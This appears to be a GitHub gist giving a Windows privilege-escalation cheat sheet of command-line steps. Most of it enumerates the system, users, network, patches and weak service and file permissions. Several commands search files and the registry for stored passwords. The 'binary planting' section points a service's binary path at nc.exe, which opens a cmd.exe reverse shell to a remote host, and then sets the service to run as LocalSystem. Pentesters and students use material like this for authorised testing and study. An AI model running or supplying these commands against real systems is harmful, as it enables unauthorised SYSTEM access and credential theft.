Skip to content

Instantly share code, notes, and snippets.

What would you like to do?
Windows Privilege Escalation
// What system are we connected to?
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
// Get the hostname and username (if available)
echo %username%
// Get users
net users
net user [username]
// Networking stuff
ipconfig /all
// Printer?
route print
// ARP-arific
arp -A
// Active network connections
netstat -ano
// Firewall fun (Win XP SP2+ only)
netsh firewall show state
netsh firewall show config
// Scheduled tasks
schtasks /query /fo LIST /v
// Running processes to started services
tasklist /SVC
net start
// Driver madness
// WMIC fun (Win 7/8 -- XP requires admin)
wmic /?
# Use wmic_info script!
// WMIC: check patch level
wmic qfe get Caption,Description,HotFixID,InstalledOn
// Search pathces for given patch
wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB.." /C:"KB.."
// AlwaysInstallElevated fun
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
// Other commands to run to hopefully get what we need
dir /s *pass* == *cred* == *vnc* == *.config*
findstr /si password *.xml *.ini *.txt
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
// Service permissions
sc query
sc qc [service_name]
// Accesschk stuff
accesschk.exe /accepteula (always do this first!!!!!)
accesschk.exe -ucqv [service_name] (requires sysinternals accesschk!)
accesschk.exe -uwcqv "Authenticated Users" * (won't yield anything on Win 8)
accesschk.exe -ucqv [service_name]
// Find all weak folder permissions per drive.
accesschk.exe -uwdqs Users c:\
accesschk.exe -uwdqs "Authenticated Users" c:\
// Find all weak file permissions per drive.
accesschk.exe -uwqs Users c:\*.*
accesschk.exe -uwqs "Authenticated Users" c:\*.*
// Binary planting
sc config [service_name] binpath= "C:\nc.exe -nv [RHOST] [RPORT] -e C:\WINDOWS\System32\cmd.exe"
sc config [service_name] obj= ".\LocalSystem" password= ""
sc qc [service_name] (to verify!)
net start [service_name]
Mostly all of this taken from
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment